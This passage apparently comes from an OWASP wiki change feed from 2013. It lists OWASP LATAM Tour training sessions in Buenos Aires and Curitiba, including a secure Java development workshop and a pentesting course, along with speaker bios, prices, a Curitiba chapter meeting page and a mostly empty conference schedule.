Cristian F. Borghello, es Licenciado en Sistemas, desarrollador, Certified Information Systems Security Professional (CISSP) y Microsoft MVP Security (Most Valuable Professional). Actualmente es Director de Segu-Info y se desempeña como consultor independiente en Seguridad de la Información. Escribe para diversos medios especializados e investiga en forma independiente sobre Seguridad Informática y de la Información. Ha disertado se congresos y seminarios nacionales e internacionales sobre la temática. El interés por la Seguridad Informática y su investigación lo ha llevado a mantener este sitio: http://www.segu-info.com.ar/ Cristian es miembro del capítulo Buenos Aires de OWASP, asi como de los capítulos ISSA (Information Systems Security Association), CSA (Cloud Security Alliance) e ISC2 Argentina.&lt;br /&gt;
&lt;br /&gt;
'''Duracion:''' 8 horas&lt;br /&gt;
&lt;br /&gt;
'''Precio:''' U$S300 No miembros / U$S250 Miembros OWASP. Existen tambien descuentos para grupos.&lt;br /&gt;
&lt;br /&gt;
'''Para mayor informacion y registro''': [http://www.regonline.com/latamtour13urutrainingpentest HAGA CLIC AQUI!]'''&amp;lt;br&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background: #4B0082;&amp;quot; colspan=&amp;quot;2&amp;quot; | &amp;lt;span style=&amp;quot;color:#ffffff&amp;quot;&amp;gt;'''BUENOS AIRES - ARGENTINA'''&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:20%&amp;quot; valign=&amp;quot;middle&amp;quot;  bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Fecha''' &lt;br /&gt;
| style=&amp;quot;width:80%&amp;quot; valign=&amp;quot;middle&amp;quot;  bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Lugar'''&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#dbdbf3&amp;quot; align=&amp;quot;center&amp;quot; | Jueves 4 de abril de 2013&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#dbdbf3&amp;quot; align=&amp;quot;left&amp;quot; | Globant - Oficina South Park - Humberto Primo 53 (esq. Av. Ing. Huergo), Ciudad de Buenos Aires&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; | [[Image:Cerullof.jpg|150px]]&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;left&amp;quot; | '''Taller: Desarrollo Seguro usando OWASP ESAPI'''&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Este curso tiene como objetivo proporcionar los conocimientos y recursos necesarios para mejorar la seguridad de las aplicaciones Java utilizando las librerias OWASP Enterprise Security API (ESAPI). Estas librerias se han diseñado para que sea más fácil para los desarrolladores mejorar la seguridad en aplicaciones existentes, como asi tambien utilizarlas como base para el desarrollo de nuevas aplicaciones. Los principios generales aprendidos en el curso se puede aplicar en el contexto de otros lenguajes de programación.&lt;br /&gt;
&lt;br /&gt;
'''Perﬁl del orador'''&lt;br /&gt;
&lt;br /&gt;
Fabio Cerullo, CEO y fundador de Cycubix, ayuda a clientes de todo el mundo a mejorar la seguridad de aplicaciones desarrolladas internamente o por terceros, mediante la definición de políticas y normas, implementando iniciativas de desarrollo seguro y gestión de riesgos, así como brindando capacitación sobre el tema a desarrolladores, auditores, ejecutivos y profesionales.&amp;lt;br&amp;gt;&lt;br /&gt;
Como miembro de la Fundación OWASP, Fabio se encarga de coordinar actividades globales de concientizacion sobre seguridad de aplicaciones con empresas privadas, gobiernos e instituciones educativas.&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Duracion:''' 8 horas&lt;br /&gt;
&lt;br /&gt;
'''Precio:''' U$S300 No miembros / U$S250 Miembros OWASP. Existen tambien descuentos para grupos.&lt;br /&gt;
&lt;br /&gt;
'''Para mayor informacion y registro''': [http://www.regonline.com/latamtour13argtrainingesapi HAGA CLIC AQUI!]'''&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; | [[Image:Cristian-borghello-P.jpg|150px]]&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;left&amp;quot; | '''OWASP para Pentesters'''&lt;br /&gt;
&lt;br /&gt;
Los desarrolladores son una raza extraña. Los Pentesters viven en una burbuja. Este entrenamiento ayuda a los desarrolladores a conocer sobre seguridad en el desarrollo web y a los Pentesters a probar aplicaciones web de forma adecuada.&lt;br /&gt;
&lt;br /&gt;
Orientado a desarrolladores, pentesters y personas relacionados con el ciclo de vida del desarrollo de software o sus pruebas de seguridad.&lt;br /&gt;
&lt;br /&gt;
'''Nivel:''' Intermedio&lt;br /&gt;
&lt;br /&gt;
'''Objetivos:'''&lt;br /&gt;
&lt;br /&gt;
- Conocer OWASP Top 10 (quick summary)&lt;br /&gt;
- Aprender cómo comprobar cada vulnerabilidad desde el punto de vista del Desarrollador y del Pentester&lt;br /&gt;
- Conocer recomendaciones desde el punto de vista del Pentester&lt;br /&gt;
- Conocer recomendaciones desde el punto de vista del Desarrollador&lt;br /&gt;
&lt;br /&gt;
'''Perfil del orador'''&lt;br /&gt;
&lt;br /&gt;
Cristian F. Borghello, es Licenciado en Sistemas, desarrollador, Certified Information Systems Security Professional (CISSP) y Microsoft MVP Security (Most Valuable Professional). Actualmente es Director de Segu-Info y se desempeña como consultor independiente en Seguridad de la Información. Escribe para diversos medios especializados e investiga en forma independiente sobre Seguridad Informática y de la Información. Ha disertado se congresos y seminarios nacionales e internacionales sobre la temática. El interés por la Seguridad Informática y su investigación lo ha llevado a mantener este sitio: http://www.segu-info.com.ar/ Cristian es miembro del capítulo Buenos Aires de OWASP, asi como de los capítulos ISSA (Information Systems Security Association), CSA (Cloud Security Alliance) e ISC2 Argentina.&lt;br /&gt;
&lt;br /&gt;
'''Duracion:''' 8 horas&lt;br /&gt;
&lt;br /&gt;
'''Precio:''' U$S300 No miembros / U$S250 Miembros OWASP. Existen tambien descuentos para grupos.&lt;br /&gt;
&lt;br /&gt;
'''Para mayor informacion y registro''': [http://www.regonline.com/latamtour13argtrainingpentest HAGA CLIC AQUI!]'''&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
|} &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
{|style=&amp;quot;vertical-align:top;width:90%;background-color:#white;padding:10px;border:1px solid silver;&amp;quot; align=&amp;quot;center&amp;quot; cellspacing=&amp;quot;5&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;/div&gt;</summary>
		<author><name>Wagner.elias</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Curitiba&amp;diff=146880</id>
		<title>Curitiba</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Curitiba&amp;diff=146880"/>
				<updated>2013-03-06T20:49:09Z</updated>
		
		<summary type="html">&lt;p&gt;Wagner.elias: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Chapter Template|chaptername=Curitiba|extra=The chapter leader is [mailto:wagner.elias@owasp.org Wagner Elias]|mailinglistsite=http://lists.owasp.org/mailman/listinfo/owasp-Curitiba|emailarchives=http://lists.owasp.org/pipermail/owasp-Curitiba}}&lt;br /&gt;
&lt;br /&gt;
==== Local News ====&lt;br /&gt;
&lt;br /&gt;
04/07/2012 - Primeira reunião do capítulo Curitiba no próximo dia 12 de Julho de 2012.&lt;br /&gt;
&lt;br /&gt;
==== Chapter Meetings ====&lt;br /&gt;
 '''Reunião 01'''&lt;br /&gt;
&lt;br /&gt;
Dando início as atividades do Capítulo Curitiba-PR convido a todos para participar da primeira reunião:&lt;br /&gt;
&lt;br /&gt;
'''Data:''' 12 de Julho de 2012&lt;br /&gt;
'''Endereço:''' Rua Marechal Hermes, 678 - CJ 32 - Curitiba, PR - Centro Cívico&lt;br /&gt;
'''Horário:''' 19h&lt;br /&gt;
&lt;br /&gt;
'''Tópicos:'''&lt;br /&gt;
&lt;br /&gt;
1 - Apresentação do que é a OWASP e seus objetivos;&lt;br /&gt;
2 - Apresentação dos principais projetos da OWASP;&lt;br /&gt;
3 - Discussão sobre como os voluntários podem contribuir.&lt;br /&gt;
&lt;br /&gt;
Por favor confirme sua participação enviando um email para: wagner.elias@owasp.org&lt;br /&gt;
&lt;br /&gt;
'''Obs.:''' a reunião é aberta a qualquer interessado e não apenas a membros da OWASP.&lt;br /&gt;
&lt;br /&gt;
==== Conferences ====&lt;br /&gt;
 '''OWASP LATAM Tour 2013'''&lt;br /&gt;
&lt;br /&gt;
OWASP LATAM TOUR, é um evento que passa pela América Latina promovendo a segurança em aplicações web em várias instituições, tais como universidades, órgãos governamentais, empresas de TI e as instituições financeiras que procuram criar a consciência de segurança em aplicações e pode tomar decisões sobre os verdadeiros riscos de segurança.&lt;br /&gt;
&lt;br /&gt;
'''Data:''' 25 e 26 de Março de 2013&lt;br /&gt;
'''Endereço:''' UP - Universidade Positivo - Rua Professor Pedro Viriato Parigot de Souza, 5.300 - Campo Comprido - Ctba - PR - Fone: (41) 3317-3000&lt;br /&gt;
'''Detalhes:''' https://www.owasp.org/index.php/LatamTour2013#Curitiba&lt;br /&gt;
&lt;br /&gt;
==== Curitiba OWASP Chapter Leaders ====&lt;br /&gt;
The chapter leader is [mailto:wagner.elias@owasp.org Wagner Elias]&lt;br /&gt;
__NOTOC__&lt;br /&gt;
&amp;lt;headertabs/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Chapter]]&lt;br /&gt;
[[Category:Brasil]]&lt;/div&gt;</summary>
		<author><name>Wagner.elias</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=LatamTour2013_CUR_Agenda&amp;diff=146802</id>
		<title>LatamTour2013 CUR Agenda</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=LatamTour2013_CUR_Agenda&amp;diff=146802"/>
				<updated>2013-03-06T17:43:42Z</updated>
		
		<summary type="html">&lt;p&gt;Wagner.elias: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;noinclude&amp;gt;{{:LatamTour2013 header}}&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{|style=&amp;quot;vertical-align:top;width:90%;background-color:#white;padding:10px;border:1px solid silver;&amp;quot; align=&amp;quot;center&amp;quot; cellspacing=&amp;quot;5&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; height=&amp;quot;30&amp;quot; style=&amp;quot;background:#CCCCEE;&amp;quot; colspan=&amp;quot;2&amp;quot;       | '''Treinamento e Conferência''' &lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background:#EEEEEE;&amp;quot; colspan=&amp;quot;2&amp;quot;                   | &lt;br /&gt;
== '''OWASP Latam Tour - Curitiba 2013''' == &lt;br /&gt;
'''Segunda 25 de Março''' ''(Treinamento 8h - Pago)'' &amp;lt;br&amp;gt;'''Terça 26 de Março''' ''(Conferência - Gratuita)''&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;center&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;2&amp;quot;             | '''Descrição e Objetivo'''&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;left&amp;quot; height=&amp;quot;80&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;left&amp;quot; colspan=&amp;quot;2&amp;quot; | '''OWASP LATAM TOUR,''' é um evento que passa pela América Latina promovendo a segurança em aplicações web em várias instituições, tais como universidades, órgãos governamentais, empresas de TI e as instituições financeiras que procuram criar a consciência de segurança em aplicações e pode tomar decisões sobre os verdadeiros riscos de segurança.&lt;br /&gt;
&lt;br /&gt;
* Além do OWASP Top 10, a maioria dos [[:Category:OWASP_Project|Projetos OWASP]] não são amplamente utilizados nos ambientes corporativos. Na maioria dos casos isso não é devido a falta de qualidade nos projetos ou documentação disponível, mas sim aonde se encaixariam em um Ecosistema de Segurança de Aplicações empresarial.&lt;br /&gt;
&lt;br /&gt;
* Este evento tem como objetivo alterar este cenário oferecendo uma explicação de alguns dos projetos OWASP mais maduros e prontos para uso no negócio, além de treinamentos e palestras &lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background:#CCCCEE;&amp;quot; colspan=&amp;quot;2&amp;quot; | '''Promoção'''&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;left&amp;quot; height=&amp;quot;80&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;2&amp;quot; | OFERTA ESPECIAL - Ao longo do OWASP Latam TOUR a taxa de adesão anual é de apenas U$D 20. Use o código de desconto &amp;quot;LATAM&amp;quot; durante o processo de registro de um membro individual do link disponível abaixo.&amp;lt;br&amp;gt;&lt;br /&gt;
[https://www.cvent.com/Events/ContactPortal/Login.aspx?cwstub=15bbcfd1-f49b-4636-ba4e-c9ce70a265e5 Click e seja um membro OWASP] &amp;lt;br&amp;gt;&lt;br /&gt;
'''Se você não é um membro da OWASP, por favor considere fazer parte da nossa organização.'''&lt;br /&gt;
|}&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
{|style=&amp;quot;vertical-align:top;width:90%;background-color:#white;padding:10px;border:1px solid silver;&amp;quot; align=&amp;quot;center&amp;quot; cellspacing=&amp;quot;5&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background:#4B0082;&amp;quot; colspan=&amp;quot;2&amp;quot; | &amp;lt;span style=&amp;quot;color:#ffffff&amp;quot;&amp;gt; '''Treinamento (Segunda 25 de Março)'''&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:20%&amp;quot; valign=&amp;quot;middle&amp;quot;  bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Data''' &lt;br /&gt;
| style=&amp;quot;width:80%&amp;quot; valign=&amp;quot;middle&amp;quot;  bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Local'''&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; | ''' Segunda 25 de Março '''&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;left&amp;quot; | '''UP - Universidade Positivo - Rua Professor Pedro Viriato Parigot de Souza, 5.300 - Campo Comprido - Ctba - PR - Fone: (41) 3317-3000&amp;lt;br&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background:#CCCCEE;&amp;quot; colspan=&amp;quot;2&amp;quot; | '''Preço e Registro'''&lt;br /&gt;
|-&lt;br /&gt;
| U$S 300 não membro&lt;br /&gt;
U$S 250 membro OWASP&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Para consultar sobre os detalhes do treinamento acesse o seguinte link : &amp;lt;br&amp;gt;&lt;br /&gt;
'''[https://www.owasp.org/index.php/LatamTour2013#Training Treinamentos - Mais Informações]'''&lt;br /&gt;
&amp;lt;br&amp;gt;https://www.owasp.org/index.php/LatamTour2013_Training &amp;lt;br&amp;gt;.&lt;br /&gt;
|}&amp;lt;br&amp;gt;&lt;br /&gt;
{|style=&amp;quot;vertical-align:top;width:90%;background-color:#white;padding:10px;border:1px solid silver;&amp;quot; align=&amp;quot;center&amp;quot; cellspacing=&amp;quot;5&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background:#4B0082;&amp;quot; colspan=&amp;quot;2&amp;quot; | &amp;lt;span style=&amp;quot;color:#ffffff&amp;quot;&amp;gt; &lt;br /&gt;
'''Conferência (Terça - 26 de Março)''' &amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:20%&amp;quot; valign=&amp;quot;middle&amp;quot;  bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Fecha''' &lt;br /&gt;
| style=&amp;quot;width:80%&amp;quot; valign=&amp;quot;middle&amp;quot;  bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Lugar'''&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; | ''' Terça 26 de Março '''&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;left&amp;quot; | '''UP - Universidade Positivo - Rua Professor Pedro Viriato Parigot de Souza, 5.300 - Campo Comprido - Ctba - PR - Fone: (41) 3317-3000&lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background:#CCCCEE;&amp;quot; colspan=&amp;quot;2&amp;quot; | '''Preço e Registro'''&lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background:#EEEEEE;&amp;quot; colspan=&amp;quot;2&amp;quot; | A entrada para o evento é ''' LIVRE &amp;quot;'! Faça o seu registro no seguinte link &amp;lt;br&amp;gt;&lt;br /&gt;
 '''Link de Registro al OWASP LATAM TOUR 2013''': [http://www.regonline.com/Register/Checkin.aspx?EventID=1207610 AQUI!]'''&lt;br /&gt;
|-&lt;br /&gt;
|} &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
{|style=&amp;quot;vertical-align:top;width:90%;background-color:#white;padding:10px;border:1px solid silver;&amp;quot; align=&amp;quot;center&amp;quot; cellspacing=&amp;quot;5&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:90%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;40&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;6&amp;quot; | '''Grade de Palestras'''&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Horário''' &lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Assunto'''&lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Palestrante'''&lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Detalhes'''&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 09:00 - 09:15&lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 09:15 - 10:00&lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 10:00 - 10:45&lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 10:45 - 11:15&lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; |&lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 11:15 - 11:45&lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
|-&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 11:45 - 12:15&lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
|-&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 12:15 - 12:45&lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
|-&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 12:45 - 14:00&lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; |&lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
|-&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 14:00 - 14:45&lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
